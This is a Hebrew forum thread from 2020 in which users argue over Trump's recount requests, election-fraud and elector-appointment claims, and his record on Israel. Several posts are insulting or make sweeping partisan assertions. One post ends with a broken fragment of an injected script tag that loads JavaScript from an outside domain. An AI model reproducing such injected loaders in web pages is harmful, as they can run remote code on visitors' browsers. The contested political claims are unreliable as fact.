|
|
| נשלח ב-29/11/2020 12:34 |
|
| |
| עיבל כתב: |  | | ההתמוטטות נמשכת. המטה של טראמפ ביקש ספירה חוזרת בשני מחוזות בויסקונסין - מחוז מילווקי ומחוז דיין. הספירה בדיין נמשכת. הספירה במילווקי הסתיימה והתברר שהיתרון של ביידן גדל בעוד 132 קולות... זה שינוי זניח לעומת התוצאות בספירה הקודמת, אבל בהחלט לא התוצאה שאליה נשאו טראפ ושות' את נפשם. משעשעת במיוחד העובדה שכדי לספור את הקולות בפעם השנייה מטהו של טראמפ שילם למדינת ויסקונסין 3 מיליון דולר... לטפשותם של השלימזלים שמנהלים את המטה של טראמפ אין גבול... |
|
לא משנה מה יהיה בסוף.
אבל 'השמחה לאיד' שלך ממש מקוממת .
להיות 'כפוי טובה' זה הדבר הכי מגעיל ודוחה
גם אם הוא יפסיד. המינימום זה לדווח כעובדות יבשות. והאנושיות הכי בסיסית (שיש גם לבעלי חיים) זה להביע כאב וצער. .
|
|
|
|
| נשלח ב-29/11/2020 17:20 |
|
| |
קלעפער
| momeir כתב: |  | קלעפר, הקישור ל'מידע הרישמי' לא הוטמע בהודעתך. נסה שוב. לעצם העניין. בניגוד לכנסת, החוקה מאפשרת לבית המחוקקים של פינסלבניה (וגם במדינות הנוספות) למנות את האלקטורים ע"פ שיקול דעתם. ישנן עוד 30 סנאטורים,בנוסף לקולונל הסנאטור דאג מאסטיראנו , שכבא הודיעו שהשתכנעו שנעשו מעשי רמיה ושחיתות ולכן הם יצטרפו לבמהלך של מינוי האלקטורים עבור טראמפ. אינני יודע אם יהיה להם רוב. אבל מי יכול למנוע זאת מהם?
עבור דוברי העברית מצ"ב סרטון עם תרגום
תוקן על ידי momeir ב- 29/11/2020 08:59:10 |
|
תלחץ על המילה "הנה" ויפתח לך לינק.
באשר לשאלתך. אשוב על מה שכתבתי. אין לזה שום סיכוי. וגם אם עכשיו תביא לי במקום שלושים שלושים ושמונה...החוק ברור, וכל משחקי השנור של טראמפ וחבר מרעיו לא ישנו את זה. ושום קליפ מפייסבוק המכריז על אמונה באותו האיש ישנו דבר...
|
|
|
|
| נשלח ב-29/11/2020 19:02 |
|
| |
| momeir כתב: |  | |
לא משנה מה יהיה בסוף.
גם אם הוא יפסיד. המינימום זה לדווח כעובדות יבשות. והאנושיות הכי בסיסית (שיש גם לבעלי חיים) זה להביע כאב וצער. . |
|
momeir:
אין בי שום הכרת טובה לממשלו המטורף של טראמפ, למדיניותו הבדלנית, לסדיזם המרושע שבו נהג בפליטים ובמהגרים (כולל הפרדת תינוקות מאימותיהם), לתמיכתו בארגונים גזעניים ואנטישמים, להאצה בזיהום האויר והמיים באמצעות תקנות תומכות זיהום, ולטיפול המרושל והמטופש במגיפת הקורונה שעלה לפחות במאה אלף קרבנות מיותרים. אני שמח שעריץ גס אכזר ואטום זה הובס, אם כי ברור שיהיה צריך להילחם בו ובהשפעתו גם אחרי ינואר 2021. לא היבעתי צער על מפלתו של טראמפ, כי אין בי כל צער. להיפך רק נחת.
|
|
|
|
| נשלח ב-29/11/2020 21:10 |
|
| |
יש הר עיבל ויש הר ברכה. אני מסכים לכל מה שכתב עיבל ועדיין טראמפ עשה כמה דברים טובים (גם אם כוונתו לא הייתה לטובה אלא למען עצמו) למען ישראל ואפילו למען האנושות.
1. פרישה מהסכם הגרעין. 2. קיצוץ במיסים. 3. הסכמי שלום בין ישראל והערבים. 4. התחלת רפורמה במערכת המשפטית. 5.חיסולי ראשי טרור. 6. הוצאת ממון מחברי נאט"ו. 7. חיסון לקורונה. 8 ועוד.
|
|
|
|
| נשלח ב-2/12/2020 13:06 |
|
| |
קלעפער, אשמח לתגובתך/התרשמותך
הבהרה: בניגוד לכותרת האשכול, וכפי שמדגיש גם הדובר בסרטון, אינני טוען (וכפי שהברתי באשכול אחר) שאם היו אי סדרים הם היו בהכרח בכוונת זדון, או שבהכרח נעשו לטובת ביידן ושבדיקה מחודשת תסייע דוקא לטראמפ, אני גם לא בא לשלול את זה. הנושא היחיד הוא האם ישנם ראיות לאי סדרים ולכך שהשיטת המכונות ומעטפות אינה מאובטחות ואינם מסוגלות להבטיח תוצאות אמת שמשקפות את רצון הבוחר ובאמצעות קולות כשרים בלבד.
מי שמעוניין להתמודד עם הטענות הללו, בשמחה. על כל השאר אין לי עניין להתווכח.
למעוניינים, יש אופציה לתגובות+תרגום אוטומטי לעברית
תוקן על ידי אפיקטוזין ב- 02/12/2020 13:18:37
|
|
|
|
|
| נשלח ב-2/12/2020 14:03 |
|
| |
| עיבל כתב: |  |
לא משנה מה יהיה בסוף.
גם אם הוא יפסיד. המינימום זה לדווח כעובדות יבשות. והאנושיות הכי בסיסית (שיש גם לבעלי חיים) זה להביע כאב וצער. .
momeir:
אין בי שום הכרת טובה לממשלו המטורף של טראמפ, למדיניותו הבדלנית, לסדיזם המרושע שבו נהג בפליטים ובמהגרים (כולל הפרדת תינוקות מאימותיהם), לתמיכתו בארגונים גזעניים ואנטישמים, להאצה בזיהום האויר והמיים באמצעות תקנות תומכות זיהום, ולטיפול המרושל והמטופש במגיפת הקורונה שעלה לפחות במאה אלף קרבנות מיותרים. אני שמח שעריץ גס אכזר ואטום זה הובס, אם כי ברור שיהיה צריך להילחם בו ובהשפעתו גם אחרי ינואר 2021. לא היבעתי צער על מפלתו של טראמפ, כי אין בי כל צער. להיפך רק נחת. |
|
לפחות לחוסיין אובמה שעשה הכל אבל הכל להציק למדינתנו יש לך הכרת טובה. גם משהו.
|
|
|
|
| נשלח ב-2/12/2020 14:09 |
|
| |
| עיבל כתב: |  | ...לתמיכתו בארגונים גזעניים ואנטישמים... |
|
הכי אהבתי את העובדה שהסתומים הליברלים מייחסים לטראמפ אנטישמיות... מבחינתם זה לא משנה מה תלביש על ה'לא ליברלי' אפילו תגיד שיש לו שער שחור, העיקר תגיד את זה הרבה פעמים ואם מישהו מתווכח - זה סימן שלא אמרת מספיק פעמים
מעולם לא היה נשיא שעשה בשביל עם ישראל מה שעשה טראמפ - אבל הוא תומך באנטישמיים עדיף ביידן הישנוני שהודיע שיחזיר את הסכם הגרעין שיקדם חוקים פרוגרסיביים מטורללים שיצר את צעדיה של ישראל (אני מבין שזה לא משכנע, כי אמרתי רק פעם אחת)< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">>
|
|
|
|
| נשלח ב-2/12/2020 15:05 |
|
| |
מה אתם רוצים מהר 'עיבל' .
הכל הפוך...הקללות הם 'ברכה'.
בעולמו של 'עיבל' טראמפ הוא אנטישמי. אושוויץ היה כנראה מחנה נופש. ואדון רוחני הוא בכלל אוהב ישראל מושבע.
ושכחתי...שנתניהו הוא בכלל נאצי...
|
|
|
|
| נשלח ב-2/12/2020 15:27 |
|
| |
שפת חרשים?
כותבי האשכול מעריצים את טראמפ, מבחינה "יהודית" ישראלית. עיבל - בניגוד אליכם - מסתכל על הדברים מבחינה "אנושית" ליברלית.
|
|
|
|
| נשלח ב-2/12/2020 15:32 |
|
| |
רק ראיה 'עיבלית' רואה במבט יהודי סתירה למבט אנושי.
"ואת הקללה על הר עיבל".
|
|
|
|
| נשלח ב-2/12/2020 16:19 |
|
| |
קלעפער
| אפיקטוזין כתב: |  |
קלעפער, אשמח לתגובתך/התרשמותך
הבהרה: בניגוד לכותרת האשכול, וכפי שמדגיש גם הדובר בסרטון, אינני טוען (וכפי שהברתי באשכול אחר) שאם היו אי סדרים הם היו בהכרח בכוונת זדון, או שבהכרח נעשו לטובת ביידן ושבדיקה מחודשת תסייע דוקא לטראמפ, אני גם לא בא לשלול את זה. הנושא היחיד הוא האם ישנם ראיות לאי סדרים ולכך שהשיטת המכונות ומעטפות אינה מאובטחות ואינם מסוגלות להבטיח תוצאות אמת שמשקפות את רצון הבוחר ובאמצעות קולות כשרים בלבד.
מי שמעוניין להתמודד עם הטענות הללו, בשמחה. על כל השאר אין לי עניין להתווכח.
למעוניינים, יש אופציה לתגובות+תרגום אוטומטי לעברית
תוקן על ידי אפיקטוזין ב- 02/12/2020 13:18:37 |
|
אני מוכן מסכים לטענתך הכללית. זה יתכן. בפועל זה לא ישנה. מעבר לזה שמבחינת משפטית עדותו מהווה מקסימום סיבה לפתיחה בחקירה (למצוא את הטריילר) ולא לשינוי התוצאות. הוא אינו יודע כמה מדובר. ואין לו מושג למי היו קולות אלו, בהנחה שכל מה שמה אמר אמת. לפי דעתי הוא גם לא מדייק בעובדות. ביחוד שבדיוק אתמול התובע הראשי הכריז שבדיקות הFBI ומשרד המשפטים לא העלו דבר.
|
|
|
|
| נשלח ב-2/12/2020 16:21 |
|
| |
קלעפער
| יוחנןש כתב: |  | שפת חרשים?
כותבי האשכול מעריצים את טראמפ, מבחינה "יהודית" ישראלית. עיבל - בניגוד אליכם - מסתכל על הדברים מבחינה "אנושית" ליברלית. |
|
כרגיל משקפיך אינן נקיות. אני התייחסתי גם לתמיכה בישראל וגם לפעולות אנושיות כלליות כמו הרפורמה במערכת בתי הסוהר.
|
|
|
|
| נשלח ב-2/12/2020 16:57 |
|
| |
יש בעולם לא מעט אנטישמים ותומכים באנטישמים שתומכים בישראל, זו לא סתירה שאלה מעניינת היא למה בשנים האחרונות ככל שהמנהיג גזען/לאומן/אוטוריטרי יותר הוא גם יטה יותר לתמוך בישראל
|
|
|
|
| נשלח ב-2/12/2020 18:03 |
|
| |
קלעפער
| A_Smithee כתב: |  | יש בעולם לא מעט אנטישמים ותומכים באנטישמים שתומכים בישראל, זו לא סתירה שאלה מעניינת היא למה בשנים האחרונות ככל שהמנהיג גזען/לאומן/אוטוריטרי יותר הוא גם יטה יותר לתמוך בישראל |
|
במקרה של טראמפ זה בגלל האוונגליסטים שתומכים בישראל כמו בארה"ב. שום נשיא שלא תומך מלא בישראל יקבל את תמיכתם.
|
|
|
|
| נשלח ב-2/12/2020 20:49 |
|
| |
נו באמת, הוא היה חייב לשחרר את רובשקין בשבילם? ולמה נשיאים רפובליקניים קודמים לא העבירו שגרירות ולא הכירו בגולן ולא הציעו תכנית שמוחקת את המדינה הפלשתינאית????
|
|
|
|
|